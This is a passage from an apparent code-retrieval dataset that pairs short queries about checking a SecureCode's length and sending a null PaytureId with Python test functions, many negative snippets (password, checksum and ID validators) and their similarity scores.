abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCD\"\n result = Solution().lengthOfLongestSubstring2(s)\n self.assertEqual(result, 95)", "def clean_code(code, lengte):\n return code.zfill(lengte)", "def is_valid(key):\n return key[0:2] == \"MR\" and key[2:].isdigit() and len(key) in [9, 10]", "def _validate_instruction_code_23E(self, val):\n validate_instruction_code(val)\n return val", "def test_valid_length(self):\n f = lws.valid_length\n assert f('', [1]) is True\n assert f('+', [1, 1]) is True\n assert f('+', []) is False\n assert f('?', []) is True\n assert f('?', [1]) is True\n assert f('?', [1, 1]) is False\n assert f('?', [1, 1, 1]) is False\n assert f('*', []) is True\n assert f('*', [1, 1, 1]) is True", "def validateSN(self, ked):\n sn = ked[\"s\"]\n if len(sn) > 32:\n raise ValidationError(\"Invalid sn = {} too large for evt = {}.\"\n \"\".format(sn, ked))\n try:\n sn = int(sn, 16)\n except Exception as ex:\n raise ValidationError(\"Invalid sn = {} for evt = {}.\".format(sn, ked))\n\n return sn", "def _validate_length(data, min, max, err): # lint-amnesty, pylint: disable=redefined-builtin\n if len(data) < min or len(data) > max:\n raise errors.AccountDataBadLength(err)" ]
[ "0.66026425", "0.65196085", "0.65004146", "0.64573944", "0.6349578", "0.63249177", "0.6300502", "0.6252688", "0.6208223", "0.61255306", "0.6125403", "0.6038623", "0.60023403", "0.59888995", "0.5983042", "0.5956225", "0.59148526", "0.586905", "0.585267", "0.58380944", "0.5824577", "0.5806057", "0.57649726", "0.575952", "0.5749711", "0.5721109", "0.5698105", "0.568529", "0.5679416", "0.56778383", "0.5675576", "0.5672751", "0.5671034", "0.56681526", "0.5654222", "0.564896", "0.56350017", "0.56306547", "0.5625956", "0.56178147", "0.56103575", "0.5605694", "0.55979294", "0.5591952", "0.55825377", "0.5579731", "0.55778694", "0.55778694", "0.55740005", "0.55703795", "0.5565338", "0.55571336", "0.5554766", "0.55543095", "0.5542625", "0.5519104", "0.55156326", "0.5508873", "0.5503709", "0.5483815", "0.548267", "0.54717016", "0.5470323", "0.5462175", "0.5458004", "0.54366064", "0.5416097", "0.5415119", "0.5414041", "0.5414041", "0.54121023", "0.54118925", "0.53984344", "0.5389799", "0.5387483", "0.5383788", "0.5382592", "0.5382034", "0.5377261", "0.53736717", "0.5371749", "0.5365452", "0.535551", "0.5349266", "0.53425735", "0.5338752", "0.53385675", "0.53370166", "0.53362846", "0.53346545", "0.533339", "0.5329489", "0.5327528", "0.5324492", "0.53210604", "0.5317277", "0.5312052", "0.5305613", "0.5304149", "0.53017527", "0.5298966" ]
0.0
-1
Check length of SecureCode (SecureCode= 12345 )
def test_40(self): assert 'False' == Api.requestBlock('test-40')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_len(password_length, alphabet_length, numb_length, symb_length):\r\n return (symb_length + alphabet_length + numb_length) == password_length", "def test_valid_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def test_valid_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def check_length(string):\n if 6 < len(string) < 12:\n return True\n\n print(\"Your password is not between 6 and 12 characters\")\n return False", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def is_code_valid_checksum(processed_code):\n\n if processed_code.isnumeric():\n list_of_digits = [int(digit) for digit in processed_code]\n else:\n converted_digits = convert_code_to_decimal(processed_code)\n list_of_digits = [int(digit) for digit in converted_digits]\n\n return sum(list_of_digits) > 0 and get_calculated_checksum(list_of_digits) % 11 == 0", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def test_invalid_numeric_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == allowed_code_length_values_msg", "def test_invalid_numeric_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == parameter_is_too_long_msg.format('sender_id')", "def check_digit(raw_code):\n s = sum(code(char) * 2**index for index, char in enumerate(raw_code))\n return s % 11 % 10", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def test_invalid_nonnumeric_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n 
assert resp.json()['error_text'] == invalid_value_msg.format('code_length')", "def __len__(self):\n return len(self.code)", "def is_private(code):\n return 4000 <= code <= 4999", "def is_valid_two_digit_char(code: str) -> bool:\n\n return 10 <= int(code) <= 26", "def secure_passphrase(val: str) -> bool:\n if len(val) < 15:\n return False\n if len([v for v in val if v not in string.ascii_letters]) < 5:\n return False\n\n return True", "def test01_password_length(self):\n self.set_complexity(length=13, numeric=0, upper=0, lower=0, special=0)\n\n invalid = (\n \"A\",\n \"Tr0ub4dor&3\",\n \"!!!!!!!!!!!!\",\n \"Password\",\n \"Password123!\",\n \"admin\",\n )\n self.assertPasswordsInvalid(invalid)\n\n valid = (\n \"correcthorsebatterystaple\",\n \"abcdefghijklmopqrstuvwxyz\",\n \"12345678901234567890\",\n \"!!!!!!!!!!!!!\" \"Password123!___\",\n )\n self.set_passwords(valid)", "def test_valid_luhn(self):\n assert luhn_checksum(\"79927398713\") == 0", "def checksum(code):\n return sum(code) % 256", "def pwd_len():\r\n while True:\r\n password_length = input('How much length for password u want ? Minimum length is 6 and Maximum length is 25 : ')\r\n try:\r\n password_length = int(password_length)\r\n if 6 <= password_length <= 25:\r\n break\r\n else:\r\n print('{} is not in range'.format(password_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(password_length))\r\n return password_length", "def calculate_checksum(code):\n\n sum_odd = reduce(sum_chars, code[::2])\n sum_even = reduce(sum_chars, code[1:-1:2])\n check = (sum_even + sum_odd * 3) % 10\n\n if check == 0:\n return 0\n else:\n return 10 - check", "def is_reserved(code):\n return 1000 <= code <= 2999", "def is_secure(self):\n return (self.nbits % 8 == 0) and (self.nbits >= params.MINIMUM_KEY_SIZE)", "def verifyHashcode(digest):\n list_str = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"A\", \"B\", \"C\", \"D\", \"E\", \"F\"]\n list_num = [ 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 12 , 13 , 14 , 15 ]\n \n total = 0\n for i2 in range(len(digest)):\n digest_i = digest[i2]\n #print(\"digest_i =\", digest_i)\n \n for i1 in range(16):\n if digest_i == list_str[i1] and i2 != 0:\n total += list_num[i1]\n #print(\"total =\", total)\n #print(\"list_num[i1] =\", list_num[i1])\n continue\n \n #print(\"--- --- ---\")\n \n #print(\"total =\", total)\n \n checknum = total % 16\n #print(\"checknum =\", checknum)\n \n checkstr = list_str[checknum]\n #print(\"checkstr =\", checkstr)\n \n checkorg = digest[0]\n #print(\"checkorg =\", checkorg)\n \n if checkorg == checkstr:\n isValid = True\n else:\n isValid = False\n \n return isValid", "def __len__(self):\n return self.cli.passwords.len()", "def symbol_len(password_length):\r\n while True:\r\n symb_length = input('How much symbols you want in password? 
At least 1 : ')\r\n try:\r\n symb_length = int(symb_length)\r\n if 1 <= symb_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(symb_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(symb_length))\r\n return symb_length", "def check_password_strength():\r\n\r\n password_regex = re.compile(r'''(\r\n (?=.*[A-Z]{2})\r\n (?=.*[a-z]{3})\r\n (?=.*[/!@#$%^&_*+'\\\"-?.:;<>,])\r\n (?=.*[0-9])\r\n .{8,}\r\n )''', re.VERBOSE)\r\n\r\n get_password(password_regex)", "def test_luhn_checksum(self):\n check_digit = calculate_luhn(\"7992739871\")\n assert check_digit == 3", "def check_valid_fernet(value):\n try:\n decoded = base64.urlsafe_b64decode(value)\n if len(decoded) != 32: return False\n return True\n except binascii.Error:\n return False", "def test_invalid_luhn(self):\n assert luhn_checksum(\"79927398714\") != 0", "def validate(msg):\n valid = True\n\n if not msg or len(msg) < 4:\n return False, -1, -1\n\n checksum = msg[-1]\n length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n # try:\n # # here works for pyton 3 only\n # length = int.from_bytes(msg[1:3], byteorder='big', signed=False)\n # except Exception:\n # length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n\n validlen = len(msg[3:-1])\n validsum = 0xFF - ((sum(msg[3:-1])) & 0xFF)\n\n # print('length: ' + str(self.length) + '; ' + str(validlen))\n # print('checksum: ' + str(self.checksum) + '; ' + str(validsum))\n\n # check sanity of computed Length and Checksum with the one in the message\n if (checksum != validsum) or (length != validlen):\n valid = False\n\n return valid, length, checksum", "def _get_checksum(code: str) -> int:\r\n total = 0\r\n\r\n for index, digit in enumerate(code):\r\n digit = int(digit)\r\n if (index + 1) % 2 != 0:\r\n digit *= 2\r\n if digit > 9:\r\n digit -= 9\r\n total += digit\r\n\r\n checksum = 10 - total % 10\r\n\r\n return checksum if checksum != 10 else 0", "def validate_password(data):\n\n if \"password\" not in data:\n return False\n password = data[\"password\"]\n if len(password) < 4 or len(password) > 16:\n return False\n\n return True", "def validate_authkey(value):\n if not len(value) == 32:\n raise ValidationError(\n 'Value must be a string containing 32 alphanumeric characters')", "def is_valid_control_number(id_code: str) -> bool:\n sum = 1 * int(id_code[:1]) + 2 * int(id_code[1:2]) + 3 * int(id_code[2:3]) + 4 * int(id_code[3:4]) + 5 * \\\n int(id_code[4:5]) + 6 * int(id_code[5:6]) + 7 * int(id_code[6:7]) + 8 * int(id_code[7:8]) + 9 *\\\n int(id_code[8:9]) + 1 * int(id_code[9:10])\n control_number = sum % 11\n if int(control_number) == int(id_code[10:11]):\n return True\n elif int(control_number) == 10:\n sum = 3 * int(id_code[:1]) + 4 * int(id_code[1:2]) + 5 * int(id_code[2:3]) + 6 * int(id_code[3:4]) + 7 * \\\n int(id_code[4:5]) + 8 * int(id_code[5:6]) + 9 * int(id_code[6:7]) + 1 * int(id_code[7:8]) + 2 * \\\n int(id_code[8:9]) + 3 * int(id_code[9:10])\n control_number = sum % 11\n if control_number == int(id_code[10:11]):\n return True\n elif control_number == 10:\n if int(id_code[10:11]) == 0:\n return True\n else:\n return False\n else:\n return False", "def get_code_length(code):\n ignore = [\"{\", \"}\", \"(\", \")\", \";\", \":\"]\n for ig in ignore:\n code = code.replace(ig, \"\")\n return len([e.strip() for e in code.split(\"\\n\") if (not e.strip() == \"\") and (not e.strip() == u\"'\") and (not e.strip() == u\"u'\")])", "def passWord(pwd):\n pwdLen = len(pwd)\n if pwdLen < 4:\n raise 
Exception(\"The password is too short.\")\n if pwdLen > 8:\n raise Exception(\"tHE password is too long\")\n else:\n print('the length of the password is correct.')", "def SecondPart():\n return passwordChecker(data)", "def code_verifier(n_bytes=64):\n verifier = base64.urlsafe_b64encode(os.urandom(n_bytes)).rstrip(b'=')\n # https://tools.ietf.org/html/rfc7636#section-4.1\n # minimum length of 43 characters and a maximum length of 128 characters.\n if len(verifier) < 43:\n raise ValueError(\"Verifier too short. n_bytes must be > 30.\")\n elif len(verifier) > 128:\n raise ValueError(\"Verifier too long. n_bytes must be < 97.\")\n else:\n return verifier", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def check_ean(eancode):\n if not eancode:\n return True\n if len(eancode) <> 13:\n return False\n try:\n int(eancode)\n except:\n return False\n return ean_checksum(eancode) == int(eancode[-1])", "def check_verify_code(self):\n r = self.session.get(self.check_url)\n s = r.text\n data = json.loads(s[s.index('{'):-1])\n if data.get('codestring'):\n return data.get('codestring', \"\")\n return \"\"", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def is_sedol(value):\n return re.match(r'^[0-9BCDFGHJKLMNPQRSTVWXYZ]{6}\\d$', value)", "def test_password_strength_validator(self):\n self.assertIsNone(validate_password_strength('abcd123'))", "def number_len(password_length):\r\n while True:\r\n numb_length = input('How much numbers you want in password? At least 1 : ')\r\n try:\r\n numb_length = int(numb_length)\r\n if 1 <= numb_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(numb_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(numb_length))\r\n return numb_length", "def source_data_key_length_check(source_data_key, algorithm):\n if len(source_data_key.data_key) != algorithm.kdf_input_len:\n raise InvalidDataKeyError(\n \"Invalid Source Data Key length {actual} for algorithm required: {required}\".format(\n actual=len(source_data_key.data_key), required=algorithm.kdf_input_len\n )\n )", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n if secure_val == make_secure_val(val):\n return val", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n if secure_val == make_secure_val(val):\n return val", "def strlen(val): \n return len(val)", "def test_invalid_numeric_code_length_format(self, cred, language):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'lg': language})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == invalid_value_msg.format('lg')", "def check(string):\n if string[4]==\" \" and string[9]==\" \" and string[14]==\" \":\n add = 0\n count = 0\n for i in string:\n if 48<=ord(i)<= 57 or ord(i)==32:\n if 48 <= ord(i)<=57:\n add+=int(i)\n count+=1\n print(add,count)\n #return bool(count == 16)", "def valid_pass(password):\r\n if len(password) >= 8 and len(password) <= 25 and password != \"forgot\":\r\n return True\r\n\r\n else:\r\n print(\"This is not a vaid password\")\r\n print(\"Password should be between 8 and 25 letters\")\r\n\r\n return False", "def luhn_verifica(ccred):\n \n # Primeiro criamos uma nova cadeia, n, com os digitos do cartao de credito sem o de controle.\n # Usamos a 
funcao calc_soma para somar os digitos do cartao de acordo com o algoritmo de Luhn e juntamos o digito de controle. Caso este ultimo nao seja um algarismo, chamamos a atencao ao utilizador para o erro.\n # Caso o resto da divisao por 10 seja 0, a funcao devolve o valor logico True. \n \n\n n = ccred[:-1]\n dig_verificacao = ccred[-1]\n \n if '0' <= dig_verificacao <= '9':\n soma = calc_soma(n) + eval(dig_verificacao)\n \n else:\n raise ValueError ('function luhn_verifica() O string recebido apenas pode conter digitos') \n \n return soma % 10 == 0", "def check_secure_val(hash_val):\n\n val = hash_val.split('|')[0]\n if hash_val == make_secure_val(val):\n return val", "def checkZipCode(data):\n if len(data) < 5:\n while len(data) < 5:\n data = '0' + data\n elif len(data) > 5:\n data = data[0:4]\n # print(data)\n return (data)", "def validate_code(request):\n user_id = api.keystone.get_user_id(request)\n print \"USER CHECK\"\n print user_id\n user = api.keystone.user_get(request, user_id)\n user_auth_code = request.GET.get('auth_code', None)\n secret = request.GET.get('secret', None)\n\n #Generate a code form our side using algorithm and use it to validate\n generated_code = api.keystone.generate_totp(secret)\n\n print secret\n print user_auth_code\n print generated_code\n print 'entering code comparison'\n \n data = {}\n extra = {}\n\n #Code comparison\n if user_auth_code == generated_code:\n data['totp_authenticated'] = True\n extra['two_factor_enabled'] = True\n\textra['secret_key'] = secret\n api.keystone.enable_2fa(request, user, **extra)\n else:\n \tprint 'falseeeeee'\n data['totp_authenticated'] = False\n return JsonResponse(data)", "def CheckZipCode(zipcode):\n # see if there are enough digits\n if (len(zipcode) >= 5):\n # check if numerical\n try:\n int(zipcode)\n return True\n except:\n return False\n else:\n return False", "def test_password_length(self):\n response = self.client().post('/api/v1/auth/signup', data=self.user_data_4)\n self.assertEqual(response.status_code, 400)\n # return result in json format\n result = json.loads(response.data.decode())\n self.assertEqual(\n result[\"message\"], \"Password should not be less than four characters.\")", "def verify_code(email, val):\r\n # TODO: is this the right string?\r\n verification_string = email.lower() + '|' + val\r\n return hashlib.md5(verification_string).hexdigest()", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n return val and secure_val == make_secure_val(val)", "def is_valid_control_number(id_code: str) -> bool:\n check_numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 1]\n check_sum = 0\n for i in range(10):\n check_sum += int(id_code[i]) * check_numbers[i]\n check_sum = check_sum % 11\n if check_sum == 10:\n check_numbers = [3, 4, 5, 6, 7, 8, 9, 1, 2, 3]\n check_sum = 0\n for i in range(10):\n check_sum += int(id_code[i]) * check_numbers[i]\n check_sum = check_sum % 11\n if check_sum == int(id_code[-1]):\n return True\n return False", "def validate_uuid(self, uuid_to_check):\r\n if re.fullmatch(BASE62_REGEX, uuid_to_check):\r\n return 20 <= len(uuid_to_check) <= 22\r\n else:\r\n return False", "def alpha_len(password_length):\r\n while True:\r\n alphabet_length = input('How much alphabets you want in password? 
At least 1 : ')\r\n try:\r\n alphabet_length = int(alphabet_length)\r\n if 1 <= alphabet_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(alphabet_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(alphabet_length))\r\n return alphabet_length", "def verify(s):\n\t# Remove any spurious characters\n\ts = re.sub(r'[^0-9xX]', '', s).upper().strip()\n\n\tl = len(s)\n\n\tif l==10:\n\t\tif verify_10(s):\n\t\t\treturn s\n\telif l==13:\n\t\tif verify_13(s):\n\t\t\treturn s\n\n\t# It's not the right length to be an ISBN\n\treturn False", "def check_string_length(string):\n if len(string) > 255:\n sys.exit(\"ERROR: Max permitted string length is 255\")", "def valid_barcode(s):\n # implement this function!\n odd_digits = 0\n even_digits = 0\n result = 0\n for i in range(len(s) - 1):\n if i % 2 == 0:\n odd_digits += int(s[i])\n else:\n even_digits += int(s[i])\n result = (3 * odd_digits + even_digits) % 10\n if result != 0:\n result = 10 - result\n\n try:\n if int(s[-1]) == result and len(s) == 12:\n return True\n else:\n return False\n except IndexError:\n return False", "def ospf_lsa_checksum(lsa):\n return fletcher16_checkbytes(b\"\\x00\\x00\" + lsa[2:], 16) # leave out age", "def verify(self, k, code, counter = -1, window=30, allowed_steps=2):\n # if counter == -1:\n # verifycode = self.hotp(k, counter)\n # else:\n for i in range(0, allowed_steps + 1):\n c = hex(int((time.time() - i * window) // window))[2:]\n while len(c) < 16:\n c = \"0\" + c\n\n verifycode = self.totp(k, c, window=window)\n if code == verifycode:\n return True\n return False", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def check_pwd(password: str) -> bool:\n # if len(password) > 0 and password[0].isdigit():\n # upper: List[Any] = [letter for letter in password if letter.isupper()]\n # lower: List[Any] = [letter for letter in password if letter.islower()]\n # return len(upper) > 1 and len(lower) > 0\n # else:\n # return False\n # Professor's solution\n return len(password) >= 4 \\\n and sum([1 for c in password if c.isupper()]) >= 2 \\\n and sum([1 for c in password if c.islower()]) >= 1 \\\n and password[0].isdigit()", "def check(s1):\n chars = [0] * 128\n for c in s1:\n chars[ord(c)]+=1\n\n counter = 0\n for i in range(len(chars)):\n if chars[i] %2 != 0:\n counter+=1\n \n return counter <= 1", "def checkdigit(code):\n check = sum((i+1)*int(code[i]) for i in range(9)) % 11\n return 'X' if check == 10 else str(check)", "def test_valid_password(self):\n pass_field = Field(\"\".join(['x' * (int(self.app.config['MAX_PWD_LEN']))]))\n\n valid_password(None, pass_field)", "def create_secret_code():\n characters = string.ascii_uppercase + string.digits\n size = 6\n return ''.join(random.choice(characters) for _ in range(size))", "def len12(self, len): # -> None:\n ...", "def test_random_code_generator(self):\n # Produces similar to '8FHGNH'\n code = random_code_generator()\n self.assertEquals(len(code), 6)\n code_2 = random_code_generator()\n if code == code_2:\n self.assertEquals(False)\n # Produces similar to 'CFB-U8X-9KE-TY8':\n code_3 = random_code_generator(12, 4, '-')\n self.assertEquals(len(code_3), 15)\n self.assertEquals(len(code_3.replace('-', '')), 12)\n code_4 = random_code_generator(100, banned_chars='X')\n self.assertEquals(code_4.find('X'), -1)", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = 
{'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))", "def test_get_shortuuid_specific_length(self):\n id = get_shortuuid(length=10)\n self.assertTrue(len(id) == 10)", "def valid_serial_key(serial_key):\n parts = serial_key.split('-')\n if len(parts) != 5:\n return False\n\n for part in parts:\n if not re.match('[A-Z0-9]{5}$', part):\n return False\n\n return True", "def test_right_checksum(self):\n self.assertEqual(utils.checksum('fooo'), 'L')", "def strlen(self, tuple_data, val):\r\n return len(val)", "def strlen(self, tuple_data, val):\r\n return len(val)", "def test_long_string_positive_length(self):\n self.failUnlessEqual(self.callFunc('encode_longstr', 'hello world'), '\\x00\\x00\\x00\\x0bhello world', 'positive length long string encoding FAILED...')", "def cleanCode(si):\n while len(si) < 4: si += 'x' # fill out the length of the code string\n so = \"\"\n for ii in range(4):\n if si[ii] in \"1234567890abcdefxyABCDEFX\": # check if this is a valid character\n# [0-9a-fA-FxyX]\n so += si[ii] # valid character\n else:\n so += \"xxxx\" # fill the string with 'x'\n ii = 4 # hit a bad one, stop checking string\n return so[:4] # clean code is 4 characters long", "def clean_code(code, lengte):\n return code.zfill(lengte)", "def test_long_password():\n expect_error(register, InputError,\n \"abcdef\", \"a\" * (MIN_PASSWORD - 1), \"a\", \"A\", \"a\")", "def is_valid_payload(p):\n # if the checksum is valid the checksum calculation, without removing the\n # checksum, should be equal to zero\n\n if checksum16(p) == 0:\n return True\n else:\n return False", "def test_password_strength_validator_length_fail(self):\n with self.assertRaises(ValidationError):\n validate_password_strength('hi')", "def bit_length(self, ???):", "def test_generate_secret(self):\n random_secret = ef_password.generate_secret(24)\n self.assertEqual(len(random_secret), 24)\n assert not set('[~!@#$%^&*()_+{}\":;\\']+$').intersection(random_secret)", "def sanetoken(token):\n\t# len(CryptoHelper.longEncode(2**4096)) = 1372\n\tMAX_TOKEN_LEN = 1372\n\treturn len(token) <= MAX_TOKEN_LEN", "def validate(number):\n number = compact(number)\n if len(number) != 9:\n raise InvalidLength()\n if not isdigits(number[2:]):\n raise InvalidFormat()\n if not isdigits(number[:2]) and not all(x in 'ABCEHKMOPT' for x in number[:2]):\n raise InvalidFormat()\n if number[0] not in '1234567ABCEHKM':\n raise InvalidComponent()\n if number[-1] != calc_check_digit(number):\n raise InvalidChecksum()\n return number", "def test_random_password():\n output = sh.random_password()\n assert isinstance(output, str) is True\n assert len(output) == 16", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def test_encodes_short_string(self):\n result = encode_run_length(\"AAABBBRYUIWW\")\n self.assertEqual(result, \"3A3B1R1Y1U1I2W\")", "def test_allowed_chars(self):\n hash_val = 
self.reverse_hash.get_hash('123')\n self.assertEqual(hash_val['error'], 'allowed chars {}'.format(self.reverse_hash.letters))", "def url_contains_auth_code(url: str) -> bool:\n return url.count(\"code=\") == 1", "def generate_verification_code(self, size=10, chars=string.digits):\n return \"\".join(random.choice(chars) for _ in range(size))", "def _validate_instruction_code_23E(self, val):\n validate_instruction_code(val)\n return val", "def validate_password(password):\n return isinstance(password, str) and len(password) >= 8 and \\\n re.search(r'[A-Z]', password) and re.search(r'[0-9]', password)" ]
[ "0.6516901", "0.6493827", "0.6453173", "0.63646185", "0.63212717", "0.6252427", "0.62409246", "0.6239357", "0.6138511", "0.61252916", "0.6071785", "0.6037417", "0.597209", "0.5948118", "0.5946584", "0.5912807", "0.59077805", "0.5901145", "0.58799016", "0.5859251", "0.58228135", "0.5796874", "0.57880145", "0.5764512", "0.57466596", "0.5727456", "0.5694502", "0.5687302", "0.5681753", "0.5679756", "0.567412", "0.5657683", "0.5650892", "0.5649115", "0.56466", "0.5644119", "0.56336683", "0.56030476", "0.5593121", "0.5551763", "0.5539865", "0.5537167", "0.55350655", "0.5534674", "0.5533335", "0.5524995", "0.55240136", "0.552254", "0.552254", "0.5518472", "0.5515472", "0.55111945", "0.5498758", "0.5486761", "0.5481363", "0.54778147", "0.54768264", "0.547063", "0.54677707", "0.5465291", "0.5459719", "0.54557514", "0.5452458", "0.5448294", "0.5421338", "0.54147524", "0.5393928", "0.53919375", "0.5381301", "0.5379857", "0.5377943", "0.53687775", "0.53634316", "0.5355129", "0.53483015", "0.5345736", "0.53444326", "0.5341786", "0.5338288", "0.5332644", "0.53242177", "0.53231364", "0.53231364", "0.5322299", "0.5321128", "0.53188056", "0.5315349", "0.53150904", "0.5312802", "0.5310756", "0.530724", "0.53068453", "0.53065306", "0.5305956", "0.5295103", "0.5291291", "0.5283861", "0.52706975", "0.5269231", "0.52675354", "0.52640164" ]
0.0
-1
Send null value in PaytureId
def test_41(self): assert 'False' == Api.requestBlock('test-41')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_missing_id(self, data, **kwargs):\n if not data.get(\"project_id\"):\n data[\"project_id\"] = lambda: uuid.uuid4().hex\n\n return data", "def payment_id_leading(self) -> bool:", "def testNoneValue(self):\n objectID = uuid4()\n user = createUser(u'username', u'password', u'User',\n u'user@example.com')\n namespace = createNamespace(user, u'name')\n tag = createTag(user, namespace, u'tag')\n self.store.add(TagValue(user.id, tag.id, objectID, None))", "def no_payment_required(self):", "def uuid(self, value):\n if value is not None:\n self.keystore['id'] = value\n elif 'id' in self.keystore:\n self.keystore.pop('id')", "def test_add_none_field(self):\n user_id = get_rand_string()\n data = get_rand_string()\n id = get_rand_string()\n\n doc = {}\n doc[\"user_id\"] = user_id\n doc[\"data\"] = data\n doc[\"id\"] = id\n doc[\"num\"] = None\n\n self.conn.add(**doc)", "def test_post_cve_id_empty_amount(reg_user_headers):\n res = requests.post(\n f'{env.AWG_BASE_URL}{CVE_ID_URL}',\n headers=reg_user_headers,\n params={\n 'amount': '',\n 'batch_type': 'sequential',\n 'cve_year': f'{utils.CURRENT_YEAR}',\n 'short_name': 'mitre'\n }\n )\n assert res.status_code == 400\n response_contains_json(res, 'error', 'BAD_INPUT')", "def add_nil_values(self, coverage_id=None, value=None, reason=None):", "def add_nil_values(self, coverage_id=None, value=None, reason=None):", "def add_nil_values(self, coverage_id=None, value=None, reason=None):", "def test_post_cve_id_empty_params(reg_user_headers):\n res = requests.post(\n f'{env.AWG_BASE_URL}{CVE_ID_URL}',\n headers=reg_user_headers,\n params={\n 'amount': '',\n 'batch_type': '',\n 'cve_year': '',\n 'short_name': ''\n }\n )\n # NOTE: there isn't a `short_name` error here, why?\n assert res.status_code == 400\n response_contains(res, 'amount')\n response_contains(res, 'cve_year')", "def getid_saveifneeded(self):\n #if (not hasattr(self,'id') or self.id == None):\n if (self.id == None):\n self.save()\n return self.id", "def __init__(self,\r\n id=None,\r\n person_id=None,\r\n personality_type=None,\r\n insurance_centre_type=None,\r\n register_status=None,\r\n center_name=None,\r\n center_code=None,\r\n registration_number=None,\r\n free_use_golden_pack_expire_date=None,\r\n city_id=None,\r\n 